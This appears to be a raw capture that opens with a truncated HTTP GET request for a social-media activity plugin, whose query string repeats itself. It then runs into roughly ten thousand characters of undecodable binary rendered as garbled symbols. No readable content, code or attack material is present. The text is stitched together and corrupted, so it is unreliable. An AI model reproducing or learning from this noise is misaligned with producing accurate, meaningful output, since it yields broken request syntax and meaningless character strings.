GET /plugins/activity.php?api_key=117854138246106&border_color=%23ffffff&colorscheme=light&font=arial&header=false&height=240&locale=en_US&recommendations=true&sdk=joey&amht=240&locale=en_US&recommendations=true&sdk=joey&am•Tœ‘Z8s}<ˆÂáú /—yW@0„‹;«¿þU5 (7âò¤‡{ŒnT·ÌQx/ƒu*¿cÓIæ÷ŒDÍ¨Ì²;Þ¨Y©d€~Ó5_1ºª©sy¤.ÈdÇÿ$Ùù6‹ùL$yŒ…£’ö¨PV{²9zðnç§Ž\Qúº/—v‘øÏz]VÉ)ÕúH•ù(Ú%ÓTÃÆM*@¢†µXùî!É2TyÁøÜÍø|î„ÈŠ€é<‹{@»-ÚÜÁ æï’1¸¶”s¡y6qè¨·ÌËÕ¡{š£‘JùU:/˜nÅîÞv‚„}Í¶…ƒ£íê1ÆÖZ‘iš¤ÚCXö$f¿MïôÑ"dˆvôÏ›`|èýº5+´ðŠDè'ð wPìÚóã£qúZK »ej>Ù×/Æ5€/`Å£@¨8¶5,á,÷§7î°Éfb¹79‹ä¸CˆgSôÙ3o¿ÒKäœnpÄeúGžÇV1êW»s;LõòxŸÕÈA¢KhCêDðÔ‡š7Â”e¤Œœ|^ñ0d|3¶wj X0‡UîþÊv¤.ðŒƒ¾kvªÀ³YDØZ®/Ñã)ñ'Œ|Ø[0%A-96•`•ôjB{G]oùŠ³Ýqcð‰¬_’œ¡7s¨ a!>wgƒ½Y£õø§EVU¿¬…~ÕC‹<»Y~ÓùÍiÖwÔ–)ÂJXužbÐÂc-> Ù®HíÁ Ÿ ~Z Oà¢˜™»MMžFÄ³§¼t‰¥aƒ÷9Ò*ç£/Ý”æw Ø˜HÞñC¹¨6 i"\Ã¢µ+âÔ+Söqk^d üÎô"»gd8ž@`Uò¥µÃÉC2CÍÐËaï.¾ÓÂ,ÅÞ}ÜÜÊ%°q'Z%ðVü€ÝTüÊ£Ú‡èÄP7¬ªkL$ÞMÑöž ÈËª‡³Póxn¸ð5¢áXœ;•ÖI¤˜‹4tßo„9¸¥›W [Õ1Ò£aÊÊÂ”¤[˜Œ%Uè[›œæ:&ý‘ãcÞðO½‡@‡Õ¥™k•Þ`Ýú1é°Ž¢èxÖÆwò¼g°kL€2úT÷ò‡rGëk%QŽ› ÙÞŸµb¢’óYÊDëÈ¸.2ªÊ‚ßÇ3åõN…UæÂý"E;(¤®ÓÏ7q^j ÁÎÃKh¥p7O·36gŸÓý‚M).ÙÊâZNØZðS8»æ¶Œ‰÷÷Ž€MµKA£XÕ8¯·F0Ž*1®xõz@Ñ×³7=-øR7ðuï<+Ï>S¿œÆø<6pzº½™u*%0ž“¨dkfYj—°Ï…Œ¸g¡O!R3«ta–´éúÂ8DÖ1F¹ -‘A´Âîqµ¯ˆÇ!ºOÈ²0=re¬Û¡S&øWže§Cã/3<@µ† ¦Í·d÷.œ}ŒºíýÜ\™Jšm°Ì"Opž,A‰XKÁü|[×ëBl“úFBÁñ®¢ªå|t´DlþC‚:“BMÊ8lïë4û ‡=Å)fXõJK6$¦¿|Së`iîQó¢Qìl@ð,à‘ ” È}Ó…ìJµ˜ýp),+ ?i‘ß^7ÜušØUïß+ªpË¢/b]òôÂ§Že@ÚÒVõBL€v`É±ü,C½ØeO¼µ øÍÑÂþFEÀR{3!š!óó¼eìz*WÝÇÂ2‚µ—Ù¯e´~ŽÃŒ<Æ– ß.gàir´ÿä¥¿ü§í5¿†”^¦ ˜9ÕíÃŽsÖ…çÕ°èúy¦?ÌRÅŠ”>ë±h¤VÑ¸Ô,Å;,Èøyã;wÎIèÃØJsN´$`ßë &šæY=_PóéK·)Ø°uW2»3JGìÆ;úç:]6y-8øQšÕ‡ª,© r@ôSÓ=Cmý$C4\/»-ë6ùûoíy-c'W[gôSRB@nY§ŠçêŠy$®¾ÀYg-Ãì°7¨HîB¶oÁëC*eòbÐë@Ìê9‡ç…N×5ÔN¡+!g²Oh·ÿÙ{Š÷`,vzÀ•:Òò×º~)#[dŒÁQ[a¨"ßûjŸü“—T±¦þ›I0L£¹÷P–AÄàÊ’JÁ‰Ó!×ìzÆ¸’2‚›¯³=`u©-¦ æ¼–Á›ÊÉåä@(íxPilþqås€Ú7`'0£oÑýÁ-Z¶œ[ÒAþÀÊƒóóEh8nŽŠûÂ?°†*³ÜÎŒä#á*Tfâ›/‰h”åÈ»ì„<è!!Ó™ù‹¸'ŽaæÊ|å^óK?‚˜ŒŠ²³&v\S>—ÚäÚ€ã›kþfÐ=’¢éƒ&Þ›E_)I€Þƒ¶ÇÆèreÙ)ËšoåÙ®Íä!ßÈ÷+ŠóÂ1úËüDm•¦TÛÎÃ×)2’aú:í0ŒB¤Ÿ,Ò¬ksTIYÖŒCV¹&úû„ävH÷•~åá„IÉ˜0[ÛU´Ä?ËÞ²€–dŒýba»A¦;Çú#XJƒA¥ý´ý ª`Ý]Ž‰ÿL&ß„Žzá.Â›U••âxþ•æF³’sK–tHº4õ`•àB T©»ªÖTîOb½Á¼[‰€å%Æ1Jê¶!ªÎ`á'Ù[gTšú9ô›î|VùîÁõ7"qûâ2ˆ.h[z¼Š O¹ ü/[kX(.áçÛf~¼^gL&"eQÁzÃ`rKAÅ[·ÂÑµ ÔåW²®µMQ¼¦f¦»µtPƒÉþ®¢gÆQ=õ÷áá"Æ&*Ã^Y¥Ó¡»ªÎžîë«SaX×ênz’Æj;j—ùuÞ¯ùàŽzÊåÁÓäYï·A=**ÏïbÍµŠŽ»Íá5eO¾Ð- ¿†jtnÜ0´2à¡)ðRa˜!}Õ³øjBIR0jm~ˆPíbÑlSÅZzæYnÐ¬þÛ"]Gý–o¶Ø>â½ÖÆ›*FÆî]LŠ‚ùØiÊˆ»ŸÃ¾kkkº—ô\ÈpIrl&úåíýŸHQz!ª½Ÿ}„WyZÙˆ¬;À8S3IÈˆðòº¾v|3Ð‰ïjÝÀ¡GN¿#à\ˆå¶ˆºÊ›+C§ñ°ÑµGîÐ¿-ãÉS©{¡DüF5®@š¾Îh·ó…ôÎÁQP1Hµ¯&²uÍºµi© W6q7™˜kàwPÒ’½¦ÊÊxÍ»+K0šKµçÞï’r»õ è«,zy‘Ý±xHg|Åê¬Ó¯–@—Áÿ—æL—^L4É¡ÎzU^4xÇîç?R(L4€äc“8yu Ä{$†|GRÜfqÛŸß£æFåñ3¥¿;VgiVilCkD$qFåzÕ§Ô„lç’ÿÕ_nÖŠ¸8Káý]špx4ç¬ù¦H7‚iÝ8JË‰F/%O×j‰j3Ö·#¿1 µ ¶N˜„pBž"QùÖ±4ÀnÎó÷Ä}÷ÔU(w…°G·–3 2l©yk|K_ºŒå ®ü?ödàµÄ‘Ž%#Ê‡”ó…¢œEþ^‹Ü%Èª‚Ö_UÊ²hÔˆÀeeqp©}&^6p7û.A¤‡Û¾è:¢°7ßìˆÙê:7÷Kl4h B¥“¹±Ÿ6íK®jñØ[ùô:Ìà¶Ç'öEÜYKªÉ ætøI>üLˆÛ?à‘J]+køJ´°È˜šu‰ûhÈþõNæKžT«Ä®ž7¼!àPºîå•0QçIS™+Ô±úÿàH‚ÍÂšµ„·€åy×r¡hmÍ¥„hÆVAÍ ŽÅ³°zç~Á¦ÍJ´Wÿâ`Àýöó^&Ou°;|nNqyÿ3¥’æ9ññÇÐþÉ?9f›Ûc,Wµ")Z*Î éÛÓÈ(Ñ.^î|*iøtéfÍ _hh~¢HuéÚ¿Zµ5´ö×k5Á’t«Ác‡ú¡„«Þ;êXƒj:Š!‡R™Ñíëë•ŒAbÒ²eëtpÔð˜$Ú2 ;Å” n^NÂ˜p°Ò|ÏFÅßsÃP=I·Æo&|ÖüÇD>Zñ(:+í„-2}§ÊÝÓ’¨òþºëSËý¦1¡ ê2³fùú=è4Tærú 'âÄ³w£‹!¥”XÆqZÓÎúâ•wããv“ ,P¢Ð=5"JÏL}”}Œ”©À«–›k¦I…Š§…÷„PÉy¹4øøµ_¯èÃ›ú»j< í¥wC1¶‡A — õ'8·whüuŠÞììô%QH áb$G*TQ\]ù®Õ?¨XÕ³»ãªZi]ŸŒÝ_Õ0ì¿ÄƒÌ_êú"h|KjH–¯Å¯PL_ë¥Ì‰¢É,Šwši¾‚«ïV`G"÷žìwuv±gZ‰KÇ×ão×åká&«¡¢^Ë<Ö9j_¨éü,§5äžÅ{Ô) !ŽU×¸©Acíš ¦_í÷±€§JY=^y‡šL€T–ÈÜ‹œ…Ú´¼3ªÐD&”úž®pÆÈ©kW«¥0•©9G”¡ œ(þØ0•‡VXfž\¯/íóîQŠÆr|2˜w×Gféâé»{¸¹ˆI^ŠùZÁmær,›ØÌ‚Y¸\È„Ô!9•-6¢ËSÁÎ¬Vœ@«ñ7Jª;]ˆp¦@û=v?côå£À;î3&ržiî+OâßÕ?º¬A‚qiÄ·ã…¤Ï“[;TöÕðà{ ê·‹X”â`ÔZ~anÚÓñ‰ÖF0•áwÍ7ÙÅIƒ¸$ jœæ…®¥¸Âê1¼!åÄ§Ê€ãZõÚ‰Sèn†þ9ªîúâÿ™Œä›‹Iv XVb ëÐ0M‰bë z–b³ÃŸq¾fYÓd¨k"úµ’½®†:{MÃ$…ç”ÑM4’^!ãÀY±È_Õ78ÁçÏÐ«jÅV7¢cã.Î4Yò£¡Ágó»ÄñM-Æ{8íV”réáÆÕ—…Ü0ônþ…¹ñH6ˆ–ýô»#ã¦:€*=µü&º²ß‚fòÜ,¬¶P‰ Ê3å)¡â&YË¶ÌŽ5Ï‚Á4È§!”B(•0üœ´Y'¾êr´æ°kÐG„¥æP¯ü³sƒ);ÝÜ”ß¨ù›‰K8ö#†iàX×aíQ·lu]=í3|ü’ü1sÝË¡C›‰ñ9à¸[·Öì§í•ÛàOR§Î›8q¿àüV(®ÎÊH\üžžÿŸO%Î¼¯D”@ÐƒÎ6U°¬©@_2,„ä_ãoÎ>Ž_MÓ„!‰ñ^ô´úŒÀA–àü”)\&Ig¯¦ËìÍ&´/SD]åŠìK6MÂè'~2EÜBñ9ZK}2‚rÈ‡W›¡mpÒ ÌýÑ©X%#<†CG/m0CùsŽšÑŽ¦ƒbÎšTy ïÊ³=)”ƒÃuV‚yÀ\ Y“ø¥¾%–Ø}o¬f²¯5êB Kë=˜bdµÙòÜ¬õ=E2KV½0èXYnw+ÌŽó°KãDx•_p¥)È\ ÞZ™-ðêS.7s>¿ƒ8kðXf!Ì¹ÉÂ_¿3ð£{w¸T(œ¡TŽÛöªœâ€c¥'©;íÝûºãO'wº8œD)å!°V°à4s“"ÌxÅ;‚i]dp‘àÿóŒ}è±þ'…K ¸ø£‘äv/ÍqòÜP¿O¯¯·úµòÙ‚˜ª¬†Vàá±¡ÈgŽÎþ" I¡^=7s«Ä¶Í#Ù%2g,äuBÞñn"9r³¼çjt›Õ¯á~§¾iÄ^üÚÍppÚQj†B/’Ä''µ¢q h¬{ADl±”Ë¬ªøU˜X<<^øÄ^![]"¡`+avQScL*T ÉÑÖ¬Y ö%s 0ã“C§5ÜÃjú"4rø±ÃÛ¸¿!^/®èö‰<£EU2û/Ú~ºÛ ‡ŠgL5F°Tµ|Ëÿ\Wð…©JýÄ(À2ØXã»s÷€1ÂaõwœÂô>?e„Mtf¸Ñ—:FuA›¸U1B(z†Y9ÛV“Áïž’‘©·v†p§"‘Ïf¾ÔÅÜr"DÑ™nstQšiœsq@‚nXÇ³,ULoýù¥¦ý¨èÿ >Èh’ÏÕ•°÷‰€NMfHúéñŸI4-Ó5]QL½OOnØ{‹¶&BµÙ~ÿÎ±ôˆ÷*f¦½»_Ãi¦:Qa/wD<ó?^ÿvp¼d%/a·™óUóô“åçôóœÒUg/×©|ö^ŸL~áNzMKbdPº£b%v3¦Nò¦¶q¤Ö(û/´HíŸŠNžÑÿÐ°üv_4¨ÔˆÄ}åYX£u•D…[© N‹#™Ks4ÙŸmäFd8âêÛmÄ¢gØîˆ=ƒMœ>™ëØÐzž)w\G¿{Þ†õ7å¤_`ùõ[o›,Ùv‰×CùÍp$k›g{‚ T«qÓ]f£×EƒfBj¾é«{Êß”6 º ÿä–,…è;z™†x™CZYØ-ÃOþsÉhI.ñDŸ,dõÖúÅí_Æi¤µ5ç˜4Pi*ÔþZ!—”Ù«).ëÆ×“Ö vä`":<i"¸au:Lµm‰$Š¥¬Â ¼:e”¨mÊ²:&-iŒëexÆ4:<â×ßFä"ÁÉdbàá”ØOm§fJ7v[‰ ‘}0[Ð•“«œŽÞ(T7Ë«(˜þn$žíf9ª,}oYÝ—D5EWÁêDŠ76 3Œ©¿‹uïxri@¤Z<4¶šù ‰¸ù*ã•ä)ƒ¹º?º™Pè@C/_öMQUâ99ƒ_È”@G2%X#„%VuÂ]$ª¦–àH™ ŽsJ6}€ã±HÀ§°LÑ^À6aÊîƒ_Rwe*ÓÁ-J‹ño™ ¤<‡Äˆ×Øð“©BvBuÜáŸÀ{{c¨ÓŠWá)ZaàH ã2oT… Ÿ¶xq>uä©ÇU÷®õ%CŒ)AÛ5CgÊNYéÃ1àr(yèŒšøÓ^QÃwzGÈoOÆ|ì›%{ŒxY‡Ó›l#‚Iz#C|‹÷.!%[•Q-k£n6îŽÈÖe³LüïšÚËÇ% #ó’ÇgW²óž~Gç’6Ôstá {izž?,+xIï®Y[‚d}ÚdŒ¼eË¯l†‘MR/ë&c¸V4öyf§FŒ®55¶UýaÞ|0í¢Ì©KVçyŒ’—•l¨iLO*vé¨¿S¼œ”Ê“!íx ÒŽç,~¨2¬9dÝí5'¨¬cN(Û‰LäCªé¤ßèPáÈg¥ÜbƒDÎ†ÿ´›y“U[5„I^ùn%*E!™ËãBq‹¨Èºr‡Š þoÍiLtË9BÐ ¿*žSXKƒÌ#xú©ÔMô•ŠŒ„ù7ð`X“(¸Ü‰aŸÌy±dXRô÷³Ô¯ìîKB2TMA'`˜náé0=*ZÁ./{y{½£‡|û –ÜŽ$ôëü#Æxì]êfv¯™ÏÌ¶-1¼9œ×"c?ïÿyŒWI²È]ï÷%ÅUs–lÂ¨Y²I™3þaÌDÛsPó¶t1J“U¥Œý»š!Ô?“ú²S¡5Í5Jþñeä`Î¤T4ÕB4^( Ì=Ú†\9ßÆpæ¯‚’#Õ¯=mknn:N‹YKN.ùÆX{V(Ês--ÄÕË{¦‹Y†œ>˜Þ?J oÿª·HØ{©ºH)Ë„víRÊö4¶}€ªþüÑ<xÄ”å«”ÿ¢u‘ÅeÉD€Udõ8’>ØhÒ|7Òw!ÂnPþÃ‹ôgŠÃÔßjx$º…0Ã·HovB'(˜‰bfø‡Fæ'X8|Á¹!å”³"!ß [Ì¡ƒþ† P)}PýHHvùÜ5-9•"²,”X\p²‰¬,O§]÷Á˜ÐJ¿2Äu*LÕk—åÜË‚kÕg¾t;‘×êÞÚq Óv€H¸„,Ñi¾4né+öðC0:¢ø¢ð\½Š ^:Ÿ1ø´;Žx…BÆ®7 ‘©¤G2úCŽÒ£j 6xÔÊ0ÊGÇÿÞxBÌ¸=tlß²º—Ì£ÿks¨³WÊ„‹ÁÍäajåQ&éz÷·jxÉ å Ÿ© õÏ%²éÈïn°Ü\!©kmÉ(õ^Jw¹9Q*§?<›:“êª”2M© GÌdÜ2Þ'Lp"LD !F™Í²Û §Et¯:PxÂúKêå³3¸-Ó%·Æ;RA˜t æ^žzÉ]q»Ý÷ÎÓ›1lÃÊ˜}\ç¹á!Ÿ(VS&¦# Ù±õ†pœ×ÛšÉ/’û·òü/P¼Up¡‰•<ë¤pžœ‹5vßœ¹LÎì'e±îâª^‡cä¨$,|€4º }ôÅâcXötl š:)–û‹¬þs¢ý”[·âC™{4=Ç Îàâ¯²OíPÚ@íu<¤«Öˆ¯Ê¤íŸEœÆä*µë·KµJÇt±yY†À@.‹r¾áóB°I »é C\ê–ÚÊÜË>Ü¢R_o~`î|V¨¶LuÓõ 9ü÷êò„)Ãc´"=‹ê=ÿé«æ¬&õé§e¸”ÌÀa[§×®È³ë7w85Ží^dêiÙ¶GæfÑŸî¨õ£À@¼î8‹÷³ÆÞ…Š¢„Xzf†ÔïQ%JÁ”9²Q4ÛÏÙuÀA¹Ž©½oDhg))€nXÙÌly„Lï5B{5ëžŽ ßzÙ'Ï¾tøÛ2}xÇË×|v¥Ä‡]nkG+}3ß~]&dÙÈ¼HÆÊüŸþ¹ÈÌTIÆ´Ðª+Êñï€ú’´éËBéÏ¡§Êmly¸ @›u8¾4rÿ…ò/#]_RŸÖFpÎ©ùŒ|å'òƒ›·8’ÃUw‡ôptç°[§šaÄâqÊG%°KJà™æÈMçîÁ4â1ê ¦J'_¿=$~²¤|ç+Á—£»ÃMO†òõ½ipm5ð¡?~µá;„ÛÐPFÒ S9>gŸ…ÃËˆ¤‘ð³-…ÄcGÂ¢Ù*aÀ5Ñ/oüýÄÉH“>aP‰jD¤n^éb¸j‰Ù¹3ãÎhCS•§9—mS˜ËŸßn3'Ìi-èÔ§Ói¬£†"Ug^Ë¶9ÿKŒkÅIàíØÈÕ/è0ëÀl ºX¤I·g±ÇÏ ³¶0Ë—€o±ƒ?ÛP½‚o~é¡˜Eó¿!L.ù6Á¶ŽP.,$†’ ¿ë¬¨&1Í>¶Yfÿ·Ÿ—÷ßgÙü""Di'ÔŽùö…„Fíy(øj\×Ñ"ßì”>ŽÇi×è;°† ÷H—^=ïd5Ìw-D;öË*c˜œØ¥vD™›GÊºüwØ†ÊÊ!×äÌ6ÂïàãZÂëÁâ/áÉ}6¹d¡œ—RÁ/€ï2~‡¨ŸÉ(¦xÃÄD’ÐíI@]wET0x++KìyšÃßÍÌÞÇÁ-SXÀP'9NU¹ˆmµ¬˜0¿y±[ßýØ 1°»«ä†ºy"¾Ž 9es—rÔŒ«£†4ù[¶…²rí0ó&rp·ôÜnïû#ÏP(£@,õ@Ö~ôœ’ZûÌK˜"µô/PÖ®»pZ[½]„µ»[mÄômË”{g‰VÚS,UÀ³ç|Sú'»LÊ'ðÛ}œ§Vg.?¦ŠŸž|Éw8¡v2¹¨;ˆd«z¦)ÅÒÞÜpÅÉLx¢ÐTKØ´Äã¶WsQ¦ÅÝÚêÆOÅù)ËµqVèbv÷Ô7ŠÇT…£ÈBd}/šŒ†‚ªÁßz¹%\ ÍµùŸ”¢;Žµ¦]Fã×$Ÿö.ÔjÒçµú´Û÷Ñƒ¯ýg\zGº'/JÔ*'ê%DÃ±Ëu7¨-0>ãoÈqã+•Ñ©ù(2—!—M¬ãMCµ]%¹í,]í°’KÚ-lÀ¥ft¾Ê!pž«e¾ÀÇè”ž•ƒacÂ3»jžulmùÑ•ïÜX3†$8Ä[þ+Ê!JÂg!¶h/ ìsg’øyÊœÎ„ÖD°‰±8UGf8|6 ƒ‚¬Ä1ÏßÛu ÁŠöðMÆ75ej‚0^:…“$my[ Ù€èu~õ+*¹27¨~©@§Yº> ù´!a¿Ì2÷[ÚÚ#ºÄÌ:¡Åë^DTyØ¦¯W™Ãù/µç›¤ìN’aAq}–V(‚W•µÿ1ÙQ“Èð†¼xÒ›~ °m;¹ÚƒÝh‰ Xïï^é%I¾zx¤Í…û[–0Œ¨jD#õfògõÿÜ·»[z+ð PX›#°èX«µ5-2k5æ÷Á_xì°ºIÙ,±)ØïsBÅb¯nRDÒ?~Vàò#ƒÙN=\GÐÄ ôú“ñºŒÜèrÓKsÇDùÍSÚíÓ¥ìàØá,@/b6dêeWAj4÷ÈƒýNœ·ÿÿËÖÂ?ÂT#¯yÍp>xû›Œ.¿õÛ×·Î¯4‹¤±lˆß|ô)IU(ÍÄAð»T|Ù·¸3Ð1ûnª8×Ïï’ «“%a¡¤!@™Û»‘AÛ é$û.ÎÐ¹—ndd‡Š„É;–Ü:+DØzO¢nÚî°´‚©t-€·9š!¥ÿZÝ*ì9|Ï€5vjŽõ÷ ÊøÁoÌ°o~Æº 9qÌD. |£f7N- u+lÁôHÉq„¨ ‘¢é3#`_¦>Ð¼f[–’@.¯}ùØ¶ìŒuˆ5ìCËwËÀƒUp¤ËQÜÅ—ÚEÃ%â’\MË:ŸYÙŠNí}òsÂóZŠï#Ü9V(›ÈLÛYùxP˜äô>Q„×rŒ½úÓÀ|K›i\ì[.IÁhï½3@œ@k°ÃgŠ¸" íŸã&À¢‡“u‘¦ØøýçÓ:ÄÆ¥±]îÿØ·lÐFŽM:?mpqCTYûDáYÑ+æÎ&‰¬»ÿR°(7ÿûDk¢¢K§á LÛÐx£{f*›Ržïÿ¨<7<™àÑTÀ‚6X 8 +–UOZ‰ILP˜#‰Õ0T²b;x(3à™ß>í,Š»„ÁbFëT´’Ý‡£ƒ§ú6áýæ+'JŠnÕßr«qÓèÇÑ ÈŽl°/›É,+·«ë¤ÂZ#àz0lÍMXŽÂs - DÔÊ+îQ u-iÒpF*"±QX ÐV7#=ct£»±{Šò'fžEEÃï,¿EálZ“Ž«SC²Rv KyT2<Ø¾~©œëâíMöo|@Ã»]]»ó;¤LvÎs ÈQjË°h©0ï"…”6fÄ`oÊi&¸–L?Ú° Íe×þ¼0x™Zˆ)Tlsüýÿ²Ü±+1Fëvw*[kÖ%;¬eÎªÛŠƒð{À²ÓE˜ ¥ð ·ß5ÎoÄ¨/½Ø6=“Y—ü©l~ØÚXñ3‰r. ˜È¬´ñ\éèØ:_j[M"oyknÁH ãÑÓŸo‰Öµ¼üYÊóŽ2Ä ‰RÖX—†EZj'F3R b.Ø'Ig¶ø”Ñü,œÃmªO™yr²¶ORHRŒ‰¹Ù¿Æ.´J¦TeñÜíˆ/CnÚ*ßû| Ÿ”=5Ò†è¥?±z¯jApä¨ŽÚÑÏå³’Ù&â†ÖàpEµþ˜‰†G›Ä7”¸Pº¡•›ÿ>ãmG¥ênküC£3(Õ“G#•]Có‹ˆyoQË}Ìç[)•>YíO¥¨Å• `É Y—„ÅÏu >yWeÈQ‘Øn·‹’M¹²mÍž9¢ÇÅÃ?TÍ¢é–gBãÞeY'»pec"T+=öÆ7ð‚”›ßæãê \Âl>»_¾¡Ã˜DŒ0ž'š-?xa¦8Ñò¿ u>è[ˆyÃM&»Gv>6IÐ“Å¢†Ù¡4ŽŠHgÑ©€A‡þ&2V sš¹Ñô½¬µ×¥°Lf¹763=yŠ÷,P-©Í“³™*:féÛ Á#é QoFc;Q¨ÆScP•¶ŽÛ¸ðü×’ÓÒÁ¯åÇóì‰q³þM%oƒÛz]Äm}õÁd!™‚,Ie¿’¨É†ã¬%Ný7:'æä¨‚vòÒê9Ÿ8²~:ðt“+Jé5NXA‚uBü\ÿÂ×çÚåƒ…sÒ„-o+r:Ž?ø.K[²Š‘ç¨m'à×îšœPìSÉ~9ØÙs¢ŒÙ—“>i¼ ¬~¤Üëž&Xî/»œd¡µu5~iîà»çâ‚™LÈ ÐBëÇTJ|%5ÛkŠ§ƒþ[éé¾LKRŒŸ¿\0ùF2þ<*V)r{?Ž¤’ðk3 YÑ&äkç–t‘áÂSØ 4G§´uEÝÊµÃW7Hâù‰¢Fr)æÎÎÙVœs ñï>$Õjalü¥ZÅ&m8P{^/[%ÚùFê>Õóþ™ì/R!*4ÚþåZ}aq¬ÛÞ¤´O™sò®Gà†?.¿© “Ù¿KwÓo™ZæµÔ¾—2Y«„3˜ÄEÕþ–?Æ¤]Säd-~—sÂ ŽNûÙŠU«†Ö¯ìå'º‹±V†jJ-Èò4Â÷kµ§ÂŒó¯1ôwm¾ÄâÍà-¶EaU4âNÌ/$I½Ë ½“>²gWç¾©¦ù‹)ûÖâqbûeíõ Ñ…³Å}ÝÞSpÁÈG¼üu¯ü¯C+öœ!ÕKó3Ãèˆ'É‡èJ. Xµ©E•:&¡JWÚÂÜ¼ð…µp"»\¥¨ ÔÔ8õŽ1â4ˆ/bßþ$8Ž§k'Ó^…òÔc#ÿ$f“?GwˆKggUQ:YH´1]üeü½PárkÜ# (qÏö ðØ‰Fæt°xI3ÜiÁq¢$òhrs "†‘ÜþëNîsüd#¯µNúÅNb\áŒt¥Fk ¶Û2U\ØÇ®'ZN§«ZÄxèRMæ¬ìjfô¤°…gSï¤ÔíÎÚTÁ}0Ì~Ä¾êyŽ¶‡„“q[Å†ù›Ç2œºuŸódaâððð‚uôuEú×Qb{=:ò0lícý¨>€Û¶Ÿ@êúòºþÀ"2>‘†ƒåÈø„aØk_x:tNÀW¼Â¼äÒ@F§Oº/€o ¡Ê*ðJúšhºþpv¿¥¯®÷ºõ˜|XLtdà{w;Büaƒ˜»ö¼gÃ-ÏŽ3-‘¾åÖq "ÑÔÑNð³W¹3âÇÅQ?~ÉC µ>KØ´Äiž÷®.åërÎÚG©ãLÜ4¨ÙÊvpãX,ÞTê„":°bP¢¯v‡˜Föª>J=¸Sšt·E¹žœâöÂÓcL§ýð“ÆãÈ¤däõëÄºŸ‚Ñä"& jdþ˜2Ä|ÃÄ ÛqvØß¬XHŒe‘YÎ¢Å:©GÃdƒjzFcãã û¢Ñ´œ8ÕøzÒÒ9¿Åªu|/ÊËŠâÇ/&<'Ö©¿Ô7%Å·Yþs‡kXÛ•›êÊY-Þ?C+GÏûNÄá–ü—Ðò—P…žGÖ ª,©ÇÙmVŸ6xi×dlÏ\DnÝÛ\¥‚ÄWb)E9”6³rù9? A\ñ×¼Ú©lßKoè’…¹®Xsß`¿>}·éª‘×GK¦=9! "íŒue%Ý‹Q¯[F[4ÿ·Ôßä@ñáy(¼PîTïB$¿_uáÌ ¡¸¾•Î¶€¯M™|LI„±GÉ3N¨PX8i*`üÊ>wbÎ”È=Š·ÙÕ÷›¥W}Œ+¦":¤Kú5wžÎ§“ì `P9‚‡ÉÑ‘u7DT{ÏüÆ£àù{“óI®Ý;5ˆöïÞÛ´H£]öKœ=´f’ [ÙC£e]µDå*ÙîÖ^¨1xiÄ#»o ípèVB&Ak¬©“dìÉS2©å7$%^çYò~àÒ'EÄjr¶–L?@'(»hr0™;<›À`Y}©J^²¼÷i{0šÀ3Ãd!J³Ù+$ŽVJxÿ½°®þPËvøþOßøWžÞ'î~À@ÔýU?È?¤r‡Ÿ(’„ÚÐpX0d¢Û Õ{ µÀžK²/\l€IÔ ƒûûQ,ñ9šy8à±©B‚h&ÐÅ-¨ÙÑèŽ*¶ô,ü3ž¾ßãµàNGŠGß/çþ†›Wäp«êìú‘ËzÁ‡!ßìD-ð)”ŒŸ’VúB¡ã³L”SÈˆ7 R|åø_$¨A52Ÿ+†tÛ$€c`¼˜æð÷2C»úÙ Ý*øVzââxúþHªL2o‰ÕËNpÍó‚Ä—G”êØ<øÃÔbÏ³ötîÁÃP:ÚdÈª]ß6ŽŸ9ËaÒA±:ê>Ô++FiäGì£ÄÌ{–2Q¬'…l8ÜÎ4_¢Y“§fÀsc=ç4¹Ü×ŸN\3X5Ó½ïW³ˆäg5Ö?xÎmwY¶8Ú:óžóxG& ¢å[ É‘ ™øCrmQa)âím[Ü¥¯¼¾âgs“¨€5}…Âªý[f¶ÇiFnM\™ÕH3‡Ï'n;ùž)ÿË~OŸx§8ƒeeÄîô)‚¹’^;‰&rÐÿò$Ð˜9ûUBro’ó¢Ú/nW¡J9kîz‘¢[|˜-•n¥ …5J·#”ëó‘xÙ“EþÓÆÚLPd›ðð¼%!5ŠÄÙ‚*òG¸Yt8ujo¼géÚWžû\?Ù6ÌÉ·mŽS[‘7—[ëŸ,7®˜ŒäQZ NµÆ›Wì;¸^tý’'•µÅÝðÑ‰áÈÄ8C$nÄÞÌû°Ø;½'\€ÄUÔjà€žjÄè“ ™Q|&x±˜×>Í.5Òž,$eŠ